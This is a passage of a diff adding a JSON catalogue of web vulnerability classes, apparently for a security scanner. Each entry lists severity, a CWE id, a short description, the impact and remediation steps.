+      "description": "Application can be framed by malicious pages, tricking users into clicking hidden elements.",
+      "impact": "Users can be tricked into performing unintended actions like transfers or permission grants.",
+      "remediation": "1. Set X-Frame-Options: DENY\n2. Implement frame-ancestors CSP directive\n3. Use JavaScript frame-busting as backup\n4. Require confirmation for sensitive actions",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "open_redirect": {
+      "title": "Open Redirect",
+      "severity": "low",
+      "cwe_id": "CWE-601",
+      "description": "Application redirects to user-specified URLs without validation.",
+      "impact": "Phishing attacks using trusted domain, credential theft, and reputation damage.",
+      "remediation": "1. Use whitelist for redirect destinations\n2. Validate redirect URLs server-side\n3. Don't use user input directly in redirects\n4. Warn users before redirecting externally",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "security_headers": {
+      "title": "Missing Security Headers",
+      "severity": "low",
+      "cwe_id": "CWE-693",
+      "description": "Application doesn't set important security headers like CSP, HSTS, X-Frame-Options.",
+      "impact": "Increased risk of XSS, clickjacking, and MITM attacks.",
+      "remediation": "1. Implement Content-Security-Policy\n2. Enable Strict-Transport-Security\n3. Set X-Frame-Options and X-Content-Type-Options\n4. Configure Referrer-Policy",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "ssl_issues": {
+      "title": "SSL/TLS Configuration Issues",
+      "severity": "medium",
+      "cwe_id": "CWE-326",
+      "description": "Weak SSL/TLS configuration including outdated protocols or weak ciphers.",
+      "impact": "Traffic interception, credential theft, and man-in-the-middle attacks.",
+      "remediation": "1. Disable SSLv3, TLS 1.0, TLS 1.1\n2. Use strong cipher suites only\n3. Enable HSTS with preload\n4. Implement certificate pinning for mobile apps",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "http_methods": {
+      "title": "Dangerous HTTP Methods Enabled",
+      "severity": "low",
+      "cwe_id": "CWE-749",
+      "description": "Server allows potentially dangerous HTTP methods like TRACE, PUT, DELETE without proper restrictions.",
+      "impact": "Potential for XST attacks, unauthorized file uploads, or resource manipulation.",
+      "remediation": "1. Disable unnecessary HTTP methods\n2. Configure web server to reject TRACE/TRACK\n3. Implement proper authorization for PUT/DELETE\n4. Use web application firewall",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "race_condition": {
+      "title": "Race Condition",
+      "severity": "medium",
+      "cwe_id": "CWE-362",
+      "description": "Application has race conditions that can be exploited through concurrent requests.",
+      "impact": "Double-spending, bypassing limits, or corrupting data through timing attacks.",
+      "remediation": "1. Implement proper locking mechanisms\n2. Use atomic database operations\n3. Implement idempotency keys\n4. Add proper synchronization",
+      "has_tester": false,
+      "false_positive_markers": []
+    },
+    "business_logic": {
+      "title": "Business Logic Vulnerability",
+      "severity": "varies",
+      "cwe_id": "CWE-840",
+      "description": "Flaw in application's business logic allowing unintended behavior.",
+      "impact": "Varies based on specific flaw - could range from minor to critical impact.",
+      "remediation": "1. Review business logic flows\n2. Implement comprehensive validation\n3. Add server-side checks for all rules\n4. Test edge cases and negative scenarios",
+      "has_tester": false,
+      "false_positive_markers": []
+    },
+    "ldap_injection": {
+      "title": "LDAP Injection",
+      "severity": "high",
+      "cwe_id": "CWE-90",
+      "description": "User input injected into LDAP queries allowing directory enumeration or auth bypass.",
+      "impact": "Directory enumeration, authentication bypass, data extraction from LDAP stores.",
+      "remediation": "1. Escape LDAP special characters\n2. Use parameterized LDAP queries\n3. Validate input against whitelist\n4. Apply least privilege to LDAP accounts",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "xpath_injection": {
+      "title": "XPath Injection",
+      "severity": "high",
+      "cwe_id": "CWE-643",
+      "description": "User input injected into XPath queries manipulating XML data retrieval.",
+      "impact": "Extraction of XML data, authentication bypass via XPath condition manipulation.",
+      "remediation": "1. Use parameterized XPath queries\n2. Validate and sanitize input\n3. Avoid string concatenation in XPath\n4. Limit XPath query privileges",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "graphql_injection": {
+      "title": "GraphQL Injection",
+      "severity": "high",
+      "cwe_id": "CWE-89",
+      "description": "Injection attacks targeting GraphQL endpoints through malicious queries or variables.",
+      "impact": "Schema exposure, unauthorized data access, denial of service via complex queries.",
+      "remediation": "1. Disable introspection in production\n2. Implement query depth/complexity limits\n3. Use persisted queries\n4. Apply field-level authorization",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "crlf_injection": {
+      "title": "CRLF Injection / HTTP Response Splitting",
+      "severity": "medium",
+      "cwe_id": "CWE-93",
+      "description": "Injection of CRLF characters to manipulate HTTP response headers or split responses.",
+      "impact": "HTTP header injection, session fixation via Set-Cookie, XSS via response splitting.",
+      "remediation": "1. Strip \\r\\n from user input in headers\n2. Use framework header-setting functions\n3. Validate header values\n4. Implement WAF rules for CRLF patterns",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "header_injection": {
+      "title": "HTTP Header Injection",
+      "severity": "medium",
+      "cwe_id": "CWE-113",
+      "description": "User input reflected in HTTP headers enabling header manipulation.",
+      "impact": "Password reset poisoning, cache poisoning, access control bypass via header manipulation.",
+      "remediation": "1. Validate Host header against whitelist\n2. Don't use Host header for URL generation\n3. Strip CRLF from header values\n4. Use absolute URLs for sensitive operations",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "email_injection": {
+      "title": "Email Header Injection",
+      "severity": "medium",
+      "cwe_id": "CWE-93",
+      "description": "Injection of email headers through form fields that feed into mail functions.",
+      "impact": "Spam relay, phishing via injected CC/BCC recipients, email content manipulation.",
+      "remediation": "1. Validate email addresses strictly\n2. Strip CRLF from email inputs\n3. Use email library APIs not raw headers\n4. Implement rate limiting on email features",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "expression_language_injection": {
+      "title": "Expression Language Injection",
+      "severity": "critical",
+      "cwe_id": "CWE-917",
+      "description": "Injection of EL/SpEL/OGNL expressions evaluated server-side in Java applications.",
+      "impact": "Remote code execution, server compromise, data exfiltration via expression evaluation.",
+      "remediation": "1. Disable EL evaluation on user input\n2. Use strict sandboxing\n3. Update frameworks (Struts2 OGNL patches)\n4. Validate input before template rendering",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "log_injection": {
+      "title": "Log Injection / Log4Shell",
+      "severity": "high",
+      "cwe_id": "CWE-117",
+      "description": "Injection into application logs enabling log forging or JNDI-based RCE (Log4Shell).",
+      "impact": "Log tampering, JNDI-based RCE (Log4Shell), log analysis tool exploitation.",
+      "remediation": "1. Strip newlines from log input\n2. Update Log4j to 2.17+ (CVE-2021-44228)\n3. Disable JNDI lookups\n4. Use structured logging",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "html_injection": {
+      "title": "HTML Injection",
+      "severity": "medium",
+      "cwe_id": "CWE-79",
+      "description": "Injection of HTML markup into web pages without script execution.",
+      "impact": "Content spoofing, phishing form injection, defacement, link manipulation.",
+      "remediation": "1. HTML-encode all user output\n2. Use Content-Security-Policy\n3. Implement output encoding libraries\n4. Sanitize HTML with whitelist approach",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "csv_injection": {
+      "title": "CSV/Formula Injection",
+      "severity": "medium",
+      "cwe_id": "CWE-1236",
+      "description": "Injection of spreadsheet formulas into data exported as CSV/Excel.",
+      "impact": "Code execution when CSV opened in Excel, DDE attacks, data exfiltration via formulas.",
+      "remediation": "1. Prefix cells starting with =,+,-,@ with single quote\n2. Sanitize formula characters\n3. Use safe CSV export libraries\n4. Warn users about untrusted CSV files",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "orm_injection": {
+      "title": "ORM Injection",
+      "severity": "high",
+      "cwe_id": "CWE-89",
+      "description": "Injection through ORM query builders via operator injection or raw query manipulation.",
+      "impact": "Data extraction, authentication bypass through ORM filter manipulation.",
+      "remediation": "1. Use ORM built-in parameter binding\n2. Avoid raw queries with user input\n3. Validate filter operators\n4. Use field-level whitelists",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "blind_xss": {
+      "title": "Blind Cross-Site Scripting",
+      "severity": "high",
+      "cwe_id": "CWE-79",
+      "description": "XSS payload stored and executed in backend/admin context not visible to the attacker.",
+      "impact": "Admin session hijacking, backend system compromise, persistent access to admin panels.",
+      "remediation": "1. Sanitize all input regardless of display context\n2. Implement CSP on admin panels\n3. Use HttpOnly cookies\n4. Review admin panel input rendering",
+      "has_tester": true,
+      "false_positive_markers": [
+        "&lt;",
+        "&gt;",
+        "Content-Security-Policy"
+      ]
+    },
+    "mutation_xss": {
+      "title": "Mutation XSS (mXSS)",
+      "severity": "high",
+      "cwe_id": "CWE-79",
+      "description": "XSS via browser HTML mutation where sanitized HTML changes to executable form after DOM processing.",
+      "impact": "Bypasses HTML sanitizers, executes JavaScript through browser parsing quirks.",
+      "remediation": "1. Update DOMPurify/sanitizers\n2. Use textContent not innerHTML\n3. Avoid innerHTML re-serialization\n4. Test with multiple browsers",
+      "has_tester": true,
+      "false_positive_markers": [
+        "&lt;",
+        "&gt;",
+        "Content-Security-Policy"
+      ]
+    },
+    "arbitrary_file_read": {
+      "title": "Arbitrary File Read",
+      "severity": "high",
+      "cwe_id": "CWE-22",
+      "description": "Reading arbitrary files via API or download endpoints outside intended scope.",
+      "impact": "Access to credentials, configuration, source code, private keys.",
+      "remediation": "1. Validate file paths against whitelist\n2. Use chroot/jail\n3. Implement proper access controls\n4. Avoid user input in file paths",
+      "has_tester": true,
+      "false_positive_markers": [
+        "403",
+        "Forbidden",
+        "Access Denied"
+      ]
+    },
+    "arbitrary_file_delete": {
+      "title": "Arbitrary File Delete",
+      "severity": "high",
+      "cwe_id": "CWE-22",
+      "description": "Deleting arbitrary files through path traversal in delete operations.",
+      "impact": "Denial of service, security bypass by deleting .htaccess/config, data destruction.",
+      "remediation": "1. Validate file paths strictly\n2. Use indirect references\n3. Implement soft-delete\n4. Restrict delete operations to specific directories",
+      "has_tester": true,
+      "false_positive_markers": [
+        "403",
+        "Forbidden",
+        "Access Denied"
+      ]
+    },
+    "zip_slip": {
+      "title": "Zip Slip (Archive Path Traversal)",
+      "severity": "high",
+      "cwe_id": "CWE-22",
+      "description": "Path traversal via crafted archive filenames writing files outside extraction directory.",
+      "impact": "Arbitrary file write, web shell deployment, configuration overwrite.",
+      "remediation": "1. Validate archive entry names\n2. Resolve and check extraction paths\n3. Use secure archive extraction libraries\n4. Extract to isolated directories",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "weak_password": {
+      "title": "Weak Password Policy",
+      "severity": "medium",
+      "cwe_id": "CWE-521",
+      "description": "Application accepts weak passwords that can be easily guessed or brute-forced.",
+      "impact": "Account compromise through password guessing, credential stuffing success.",
+      "remediation": "1. Enforce minimum 8+ character passwords\n2. Check against breached password databases\n3. Implement password strength meter\n4. Follow NIST SP 800-63B guidelines",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "default_credentials": {
+      "title": "Default Credentials",
+      "severity": "critical",
+      "cwe_id": "CWE-798",
+      "description": "Application or service uses default factory credentials that haven't been changed.",
+      "impact": "Complete unauthorized access to admin or management interfaces.",
+      "remediation": "1. Force password change on first login\n2. Remove default accounts\n3. Implement strong default password generation\n4. Regular credential audits",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "brute_force": {
+      "title": "Brute Force Vulnerability",
+      "severity": "medium",
+      "cwe_id": "CWE-307",
+      "description": "Login endpoint lacks rate limiting or account lockout allowing unlimited password attempts.",
+      "impact": "Account compromise through automated password guessing.",
+      "remediation": "1. Implement account lockout after N failures\n2. Add rate limiting per IP and per account\n3. Implement CAPTCHA after failures\n4. Use progressive delays",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "two_factor_bypass": {
+      "title": "Two-Factor Authentication Bypass",
+      "severity": "high",
+      "cwe_id": "CWE-287",
+      "description": "Second authentication factor can be bypassed through implementation flaws.",
+      "impact": "Account takeover even when 2FA is enabled, defeating the purpose of MFA.",
+      "remediation": "1. Enforce 2FA check on all authenticated routes\n2. Use server-side session state for 2FA completion\n3. Rate limit code attempts\n4. Make codes single-use with short expiry",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "oauth_misconfiguration": {
+      "title": "OAuth Misconfiguration",
+      "severity": "high",
+      "cwe_id": "CWE-601",
+      "description": "OAuth implementation flaws allowing redirect URI manipulation, state bypass, or token theft.",
+      "impact": "Account takeover via stolen OAuth tokens, cross-site request forgery.",
+      "remediation": "1. Strictly validate redirect_uri\n2. Require and validate state parameter\n3. Use PKCE for public clients\n4. Validate all OAuth scopes",
+      "has_tester": true,
+      "false_positive_markers": [
+        "401",
+        "login required"
+      ]
+    },
+    "bfla": {
+      "title": "Broken Function Level Authorization",
+      "severity": "high",
+      "cwe_id": "CWE-285",
+      "description": "Admin API functions accessible to regular users without proper role checks.",
+      "impact": "Privilege escalation to admin functionality, system configuration changes.",
+      "remediation": "1. Implement role-based access control on all endpoints\n2. Deny by default\n3. Centralize authorization logic\n4. Audit all admin endpoints",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "mass_assignment": {
+      "title": "Mass Assignment",
+      "severity": "high",
+      "cwe_id": "CWE-915",
+      "description": "Application binds user-supplied data to internal model fields without filtering.",
+      "impact": "Privilege escalation, data manipulation, bypassing business rules.",
+      "remediation": "1. Use explicit field whitelists\n2. Implement DTOs for input\n3. Validate all bound fields\n4. Use strong parameter filtering",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "forced_browsing": {
+      "title": "Forced Browsing / Broken Access Control",
+      "severity": "medium",
+      "cwe_id": "CWE-425",
+      "description": "Direct URL access to restricted resources that should require authorization.",
+      "impact": "Access to admin panels, sensitive files, debug interfaces, and internal tools.",
+      "remediation": "1. Implement authentication on all protected routes\n2. Return 404 instead of 403 for sensitive paths\n3. Remove unnecessary files\n4. Use web server access controls",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "dom_clobbering": {
+      "title": "DOM Clobbering",
+      "severity": "medium",
+      "cwe_id": "CWE-79",
+      "description": "HTML injection that overrides JavaScript DOM properties through named elements.",
+      "impact": "JavaScript logic bypass, potential XSS through clobbered variables.",
+      "remediation": "1. Use strict variable declarations (const/let)\n2. Avoid global variable references\n3. Use safe DOM APIs\n4. Sanitize HTML input",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "postmessage_vulnerability": {
+      "title": "postMessage Vulnerability",
+      "severity": "medium",
+      "cwe_id": "CWE-346",
+      "description": "postMessage handlers that don't validate message origin allowing cross-origin data injection.",
+      "impact": "Cross-origin data injection, XSS via injected data, sensitive data exfiltration.",
+      "remediation": "1. Always validate event.origin\n2. Validate message data structure\n3. Use specific target origins\n4. Minimize data sent via postMessage",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "websocket_hijacking": {
+      "title": "Cross-Site WebSocket Hijacking",
+      "severity": "high",
+      "cwe_id": "CWE-1385",
+      "description": "WebSocket endpoints accepting connections from arbitrary origins without validation.",
+      "impact": "Real-time data theft, message injection, session hijacking via WebSocket.",
+      "remediation": "1. Validate Origin header on WebSocket upgrade\n2. Require authentication per-message\n3. Implement CSRF protection for handshake\n4. Use WSS (encrypted)",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "prototype_pollution": {
+      "title": "Prototype Pollution",
+      "severity": "high",
+      "cwe_id": "CWE-1321",
+      "description": "Injection of properties into JavaScript Object.prototype through merge/extend operations.",
+      "impact": "Authentication bypass, RCE via gadget chains, denial of service.",
+      "remediation": "1. Freeze Object.prototype\n2. Sanitize __proto__ and constructor keys\n3. Use Map instead of plain objects\n4. Update vulnerable libraries",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "css_injection": {
+      "title": "CSS Injection",
+      "severity": "medium",
+      "cwe_id": "CWE-79",
+      "description": "Injection of CSS code through user input reflected in style contexts.",
+      "impact": "Data exfiltration via CSS selectors, UI manipulation, phishing.",
+      "remediation": "1. Sanitize CSS properties\n2. Use CSP style-src\n3. Avoid user input in style attributes\n4. Whitelist safe CSS properties",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "tabnabbing": {
+      "title": "Reverse Tabnabbing",
+      "severity": "low",
+      "cwe_id": "CWE-1022",
+      "description": "Links with target=_blank without rel=noopener allowing opener tab navigation.",
+      "impact": "Phishing via original tab replacement with fake login page.",
+      "remediation": "1. Add rel='noopener noreferrer' to target=_blank links\n2. Use frameworks that add it automatically\n3. Audit user-generated links",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "directory_listing": {
+      "title": "Directory Listing Enabled",
+      "severity": "low",
+      "cwe_id": "CWE-548",
+      "description": "Web server auto-indexing enabled exposing directory file structure.",
+      "impact": "Exposure of file structure, sensitive files, backup files, and configuration.",
+      "remediation": "1. Disable directory listing (Options -Indexes)\n2. Add index files to all directories\n3. Review web server configuration\n4. Use custom error pages",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "debug_mode": {
+      "title": "Debug Mode Enabled",
+      "severity": "high",
+      "cwe_id": "CWE-489",
+      "description": "Application running in debug/development mode in production.",
+      "impact": "Source code exposure, interactive console access, credential disclosure.",
+      "remediation": "1. Disable debug mode in production\n2. Use environment-specific configuration\n3. Implement custom error pages\n4. Remove debug endpoints",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "exposed_admin_panel": {
+      "title": "Exposed Administration Panel",
+      "severity": "medium",
+      "cwe_id": "CWE-200",
+      "description": "Admin panel accessible from public internet without IP restrictions.",
+      "impact": "Brute force target, credential theft, administration access if default creds.",
+      "remediation": "1. Restrict admin access by IP/VPN\n2. Use strong authentication + 2FA\n3. Change default admin paths\n4. Implement rate limiting",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "exposed_api_docs": {
+      "title": "Exposed API Documentation",
+      "severity": "low",
+      "cwe_id": "CWE-200",
+      "description": "API documentation (Swagger/OpenAPI/GraphQL playground) publicly accessible.",
+      "impact": "Complete API endpoint mapping, parameter discovery, potential unauthorized access.",
+      "remediation": "1. Disable API docs in production\n2. Require authentication for docs\n3. Disable GraphQL introspection\n4. Use API gateway access controls",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "insecure_cookie_flags": {
+      "title": "Insecure Cookie Configuration",
+      "severity": "medium",
+      "cwe_id": "CWE-614",
+      "description": "Session cookies missing security flags (Secure, HttpOnly, SameSite).",
+      "impact": "Cookie theft via XSS (no HttpOnly), MITM (no Secure), CSRF (no SameSite).",
+      "remediation": "1. Set HttpOnly on session cookies\n2. Set Secure flag on HTTPS sites\n3. Set SameSite=Lax or Strict\n4. Review all cookie configurations",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "http_smuggling": {
+      "title": "HTTP Request Smuggling",
+      "severity": "high",
+      "cwe_id": "CWE-444",
+      "description": "Discrepancy between front-end and back-end HTTP parsing enabling request smuggling.",
+      "impact": "Cache poisoning, request hijacking, authentication bypass, response queue poisoning.",
+      "remediation": "1. Use HTTP/2 end-to-end\n2. Normalize Content-Length/Transfer-Encoding\n3. Reject ambiguous requests\n4. Update proxy/server software",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "cache_poisoning": {
+      "title": "Web Cache Poisoning",
+      "severity": "high",
+      "cwe_id": "CWE-444",
+      "description": "Manipulation of cached responses via unkeyed inputs to serve malicious content.",
+      "impact": "Mass XSS via cached responses, redirect poisoning, denial of service.",
+      "remediation": "1. Include all inputs in cache key\n2. Validate unkeyed headers\n3. Use Vary header correctly\n4. Implement cache key normalization",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "rate_limit_bypass": {
+      "title": "Rate Limit Bypass",
+      "severity": "medium",
+      "cwe_id": "CWE-770",
+      "description": "Rate limiting can be bypassed through header manipulation or request variation.",
+      "impact": "Enables brute force attacks, API abuse, and denial of service.",
+      "remediation": "1. Rate limit by authenticated user, not just IP\n2. Don't trust X-Forwarded-For for rate limiting\n3. Implement at multiple layers\n4. Use sliding window algorithms",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "parameter_pollution": {
+      "title": "HTTP Parameter Pollution",
+      "severity": "medium",
+      "cwe_id": "CWE-235",
+      "description": "Duplicate parameters exploit parsing differences between front-end and back-end.",
+      "impact": "WAF bypass, logic bypass, access control circumvention.",
+      "remediation": "1. Normalize parameters server-side\n2. Reject duplicate parameters\n3. Use consistent parsing\n4. Test with duplicate params",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "type_juggling": {
+      "title": "Type Juggling / Type Coercion",
+      "severity": "high",
+      "cwe_id": "CWE-843",
+      "description": "Loose type comparison exploited to bypass authentication or security checks.",
+      "impact": "Authentication bypass, security check circumvention via type confusion.",
+      "remediation": "1. Use strict comparison (=== in PHP/JS)\n2. Validate input types\n3. Use strong typing\n4. Hash comparison with timing-safe functions",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "insecure_deserialization": {
+      "title": "Insecure Deserialization",
+      "severity": "critical",
+      "cwe_id": "CWE-502",
+      "description": "Untrusted data deserialized without validation enabling code execution.",
+      "impact": "Remote code execution, denial of service, authentication bypass.",
+      "remediation": "1. Don't deserialize untrusted data\n2. Use JSON instead of native serialization\n3. Implement integrity checks\n4. Restrict deserialization types",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "subdomain_takeover": {
+      "title": "Subdomain Takeover",
+      "severity": "high",
+      "cwe_id": "CWE-284",
+      "description": "Dangling DNS records pointing to unclaimed cloud resources.",
+      "impact": "Domain impersonation, phishing, cookie theft, authentication bypass.",
+      "remediation": "1. Audit DNS records regularly\n2. Remove dangling CNAME records\n3. Monitor cloud resource lifecycle\n4. Use DNS monitoring tools",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "host_header_injection": {
+      "title": "Host Header Injection",
+      "severity": "medium",
+      "cwe_id": "CWE-644",
+      "description": "Host header value used in URL generation enabling poisoning attacks.",
+      "impact": "Password reset poisoning, cache poisoning, SSRF via Host header.",
+      "remediation": "1. Validate Host against allowed values\n2. Use absolute URLs from configuration\n3. Don't use Host header for URL generation\n4. Implement ALLOWED_HOSTS",
+      "has_tester": true,
+      "false_positive_markers": [
+        "sanitized",
+        "escaped",
+        "encoded"
+      ]
+    },
+    "timing_attack": {
+      "title": "Timing Attack",
+      "severity": "medium",
+      "cwe_id": "CWE-208",
+      "description": "Response time variations leak information about valid usernames or secret values.",
+      "impact": "Username enumeration, token/password character extraction.",
+      "remediation": "1. Use constant-time comparison for secrets\n2. Normalize response times\n3. Add random delays\n4. Use same code path for valid/invalid input",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "improper_error_handling": {
+      "title": "Improper Error Handling",
+      "severity": "low",
+      "cwe_id": "CWE-209",
+      "description": "Verbose error messages disclosing internal information in production.",
+      "impact": "Source path disclosure, database details, technology stack exposure aiding further attacks.",
+      "remediation": "1. Use custom error pages in production\n2. Log errors server-side only\n3. Return generic error messages\n4. Disable debug/stack trace output",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "sensitive_data_exposure": {
+      "title": "Sensitive Data Exposure",
+      "severity": "high",
+      "cwe_id": "CWE-200",
+      "description": "Sensitive data (PII, credentials, tokens) exposed in responses, URLs, or storage.",
+      "impact": "Identity theft, account compromise, regulatory violations (GDPR, HIPAA).",
+      "remediation": "1. Minimize data in API responses\n2. Encrypt sensitive data at rest/transit\n3. Remove sensitive data from URLs\n4. Implement data classification",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "information_disclosure": {
+      "title": "Information Disclosure",
+      "severity": "low",
+      "cwe_id": "CWE-200",
+      "description": "Unintended exposure of internal details: versions, paths, technology stack.",
+      "impact": "Aids further attacks with technology-specific exploits and internal knowledge.",
+      "remediation": "1. Remove version headers\n2. Disable directory listing\n3. Remove HTML comments\n4. Secure .git and config files",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "api_key_exposure": {
+      "title": "API Key Exposure",
+      "severity": "high",
+      "cwe_id": "CWE-798",
+      "description": "API keys or secrets hardcoded in client-side code or public files.",
+      "impact": "Unauthorized API access, financial impact, data breach via exposed keys.",
+      "remediation": "1. Use environment variables for secrets\n2. Implement key rotation\n3. Use backend proxy for API calls\n4. Monitor key usage for anomalies",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "source_code_disclosure": {
+      "title": "Source Code Disclosure",
+      "severity": "high",
+      "cwe_id": "CWE-540",
+      "description": "Application source code accessible through misconfigured servers, backups, or VCS exposure.",
+      "impact": "White-box attack surface, credential discovery, vulnerability identification.",
+      "remediation": "1. Block .git, .svn access\n2. Remove source maps in production\n3. Delete backup files\n4. Configure web server to block sensitive extensions",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "backup_file_exposure": {
+      "title": "Backup File Exposure",
+      "severity": "high",
+      "cwe_id": "CWE-530",
+      "description": "Backup files, database dumps, or archives accessible from web server.",
+      "impact": "Full source code access, database contents including credentials.",
+      "remediation": "1. Store backups outside web root\n2. Remove old backup files\n3. Block backup extensions in web server\n4. Encrypt backup files",
+      "has_tester": true,
+      "false_positive_markers": [
+        "403",
+        "Forbidden",
+        "Access Denied"
+      ]
+    },
+    "version_disclosure": {
+      "title": "Software Version Disclosure",
+      "severity": "low",
+      "cwe_id": "CWE-200",
+      "description": "Specific software versions exposed enabling targeted CVE exploitation.",
+      "impact": "Targeted exploitation of known vulnerabilities for the specific version.",
+      "remediation": "1. Remove version from headers\n2. Update software regularly\n3. Remove version-disclosing files\n4. Customize error pages",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "weak_encryption": {
+      "title": "Weak Encryption Algorithm",
+      "severity": "medium",
+      "cwe_id": "CWE-327",
+      "description": "Use of weak/deprecated encryption algorithms (DES, RC4, ECB mode).",
+      "impact": "Data decryption, MITM attacks, breaking confidentiality protections.",
+      "remediation": "1. Use AES-256-GCM or ChaCha20\n2. Disable weak cipher suites\n3. Use TLS 1.2+ only\n4. Regular cryptographic review",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "weak_hashing": {
+      "title": "Weak Hashing Algorithm",
+      "severity": "medium",
+      "cwe_id": "CWE-328",
+      "description": "Use of weak hash algorithms (MD5, SHA1) for security-critical purposes.",
+      "impact": "Password cracking, hash collision attacks, integrity bypass.",
+      "remediation": "1. Use bcrypt/scrypt/argon2 for passwords\n2. Use SHA-256+ for integrity\n3. Always use salts\n4. Implement key stretching",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "weak_random": {
+      "title": "Weak Random Number Generation",
+      "severity": "medium",
+      "cwe_id": "CWE-330",
+      "description": "Predictable random numbers used for security tokens or session IDs.",
+      "impact": "Token prediction, session hijacking, CSRF token bypass.",
+      "remediation": "1. Use cryptographic PRNG (secrets module, SecureRandom)\n2. Avoid Math.random() for security\n3. Use sufficient entropy\n4. Regular token rotation",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "cleartext_transmission": {
+      "title": "Cleartext Transmission of Sensitive Data",
+      "severity": "medium",
+      "cwe_id": "CWE-319",
+      "description": "Sensitive data transmitted over unencrypted HTTP connections.",
+      "impact": "Credential theft via MITM, session hijacking, data exposure.",
+      "remediation": "1. Enforce HTTPS everywhere\n2. Implement HSTS with preload\n3. Redirect HTTP to HTTPS\n4. Set Secure flag on cookies",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "vulnerable_dependency": {
+      "title": "Vulnerable Third-Party Dependency",
+      "severity": "varies",
+      "cwe_id": "CWE-1104",
+      "description": "Third-party library with known CVEs in use.",
+      "impact": "Depends on specific CVE - from XSS to RCE.",
+      "remediation": "1. Regular dependency updates\n2. Use automated vulnerability scanning\n3. Monitor CVE advisories\n4. Implement SCA in CI/CD",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "outdated_component": {
+      "title": "Outdated Software Component",
+      "severity": "medium",
+      "cwe_id": "CWE-1104",
+      "description": "Significantly outdated CMS, framework, or server with multiple known CVEs.",
+      "impact": "Multiple exploitable vulnerabilities, targeted attacks.",
+      "remediation": "1. Update to latest stable version\n2. Enable automatic security updates\n3. Monitor end-of-life announcements\n4. Implement patch management",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "insecure_cdn": {
+      "title": "Insecure CDN Resource Loading",
+      "severity": "low",
+      "cwe_id": "CWE-829",
+      "description": "External scripts loaded without Subresource Integrity (SRI) hashes.",
+      "impact": "Supply chain attack via CDN compromise, mass XSS.",
+      "remediation": "1. Add integrity= attribute to script/link tags\n2. Use crossorigin attribute\n3. Self-host critical resources\n4. Implement CSP with hash sources",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "container_escape": {
+      "title": "Container Escape / Misconfiguration",
+      "severity": "critical",
+      "cwe_id": "CWE-250",
+      "description": "Container running with elevated privileges or exposed host resources.",
+      "impact": "Host system compromise, lateral movement, data access across containers.",
+      "remediation": "1. Don't use --privileged\n2. Drop unnecessary capabilities\n3. Don't mount Docker socket\n4. Use seccomp/AppArmor profiles",
+      "has_tester": true,
+      "false_positive_markers": []
+    },
+    "s3_bucket_misconfiguration": {
+      "title": "S3/Cloud Storage Misconfiguration",
+      "severity": "high",
